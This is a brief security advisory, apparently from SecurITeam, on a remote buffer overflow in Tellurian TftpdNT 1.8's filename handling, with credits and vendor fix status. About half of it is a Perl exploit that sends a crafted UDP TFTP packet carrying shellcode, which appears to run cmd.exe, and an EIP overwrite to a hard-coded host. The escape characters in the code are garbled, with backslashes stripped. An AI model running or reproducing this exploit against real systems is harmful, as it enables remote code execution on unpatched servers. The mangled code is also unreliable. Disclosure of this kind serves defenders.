‘Security Vulnerability in Tellurian TftpdNT (Long Filename) ‘

Summary

Tellurian TftpdNT is a TFTP server for Windows NT and Windows 9x.
A buffer overflow vulnerability in the product allows remote attackers to cause the product to overflow an internal buffer, while executing arbitrary code. ‘

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability.’


Details

Vulnerable systems:
 * TftpdNT version 1.8

Immune systems:
 * TftpdNT version 2.0

It is possible to cause a buffer overflow in the Tellurian TftpdNT product, while overwriting the EIP pointer – this allows remote command execution.
The overflow occurs in the product’s parsing of the filename.

Vendor status:
The vendor has been informed, and has fixed the issue within 24 hours. A new version is available on the web site.

Exploit:
#!/usr/bin/perl -w
#Tellurian TFTP Server buffer overflow vulnerability

use IO::Socket;
$host = ‘192.168.1.44’;
$port = ’69’;

$shellcode = ‘x90xCCx90x90x90x90x8BxECx55x8BxECx33
xFFx57x83xECx04xC6x45xF8x63xC6x45xF9x6DxC6x45
xFAx64xC6x45xFBx2ExC6x45xFCx65xC6x45xFDx78xC6
x45xFEx65xB8xC3xAFx01x78x50x8Dx45xF8x50xFFx55xF4x5F’;

$buf = ‘x00x02’;
$buf .= ‘x41’x(508-length($shellcode));
$buf .= $shellcode;
$buf .= ‘x0Fx02xC7’; # EIP
$buf .= ‘x00x6Ex65x74x61x73x63x69x69x00’;

print ‘Length: ‘, length($buf), ‘n’;

$socket = IO::Socket::INET->new(Proto => ‘udp’) or die ‘Socket error:
$@n’;
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die ‘Can’t send: $!n’;
print ‘Donen’; ‘

Categories: Windows